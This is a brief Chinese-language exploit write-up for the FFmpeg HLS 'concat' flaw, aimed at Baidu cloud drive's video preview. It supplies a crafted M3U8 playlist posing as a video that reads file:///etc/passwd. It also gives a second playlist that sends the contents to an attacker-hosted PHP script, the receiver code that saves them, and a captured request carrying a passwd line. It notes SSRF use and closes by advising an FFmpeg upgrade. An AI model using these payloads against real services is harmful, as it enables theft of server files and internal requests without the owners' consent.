rt
相关链接
https://hackerone.com/reports/115857 https://habrahabr.ru/company/mailru/blog/274855/
FFmpeg的问题。在百度云盘上上传一个../20220623/file.html视频,应该还影响其他的视频应用。
打开即可文件读取。
========
../20220623/file.html (需要上传到视频的文件)
#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://u-url/exp/movie/header.m3u8|file:///etc/passwd #EXT-X-ENDLIST
concat:http://u-url/exp/movie/header.m3u8|http://baidu.com
header.m3u8 (分段用的)
#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:, http://u-url/exp/movie/comm.php?x=
comm.php (接收数据用的)
file_put_contents(time()."_test.txt",$_GET['x']); ?>
准备好之后 上传mp4到百度盘上然后预览视频即可触发,也可以ssrf
数据
GET /root:x:0:0:root:/root:/bin/bash HTTP/1.1 User-Agent: Lavf/55.50.100 Accept: */* Connection: close
升级FFmpeg